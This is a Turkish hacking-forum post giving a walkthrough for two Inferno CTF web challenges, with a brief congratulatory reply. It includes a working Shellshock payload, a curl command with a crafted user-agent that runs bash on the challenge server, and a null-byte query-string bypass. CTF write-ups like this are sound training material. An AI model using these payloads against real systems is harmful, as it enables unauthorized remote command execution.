THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Inferno CTF | Web soruları çözümü

Ranger_THT - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
08/2018
Nereden:
/etc/shadow
Mesajlar:
260
Konular:
5
Teşekkür (Etti):
169
Teşekkür (Aldı):
101
Ticaret:
(0) %
1
1568
04-01-2020 16:04
#1


1-
we will we will shock you



Siteye giriş yaptığımızda apache2'nin default sayfası karşımıza geliyordu .



Siteye ctrl+u ile bakınca bashferno.cgi olduğunu görüyorduk .


/bashferno.cgi dosyasında bizi bir shellshock zafiyeti bekliyordu .



curl -H "user-agent: () { :; }; echo ; echo; /bin/bash -c 'cat flag_for_this_INFERNO.txt'" http://104.197.168.32:17012/bashferno.cgi curl ile flagımızı alıyorduk . FLAG: infernoCTF{F33l_Th3_Sh0ck}

-----------------------------------------------------------------------------------------------------------



Dante's Personel Home Page


Siteye girince bizi bu şekilde bir anasayfa karşılıyor .


_ gibi karakterler yasak olduğu için .. yapıyoruz . ?..magic..=

tht%00$dark$ yaparak flagımızı alıyoruz . FLAG : infernoCTF{1_gu3ss_y0ur_m4g1c_was_w4y_t00_d4rk}

--------------------- Banlayıvercem şimdi
ch_arli41'in öğrencisi .
P4RS, ch_arli41 Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
04-01-2020 16:12
#2
Ellerine sağlık Junior
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Ranger_THT Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler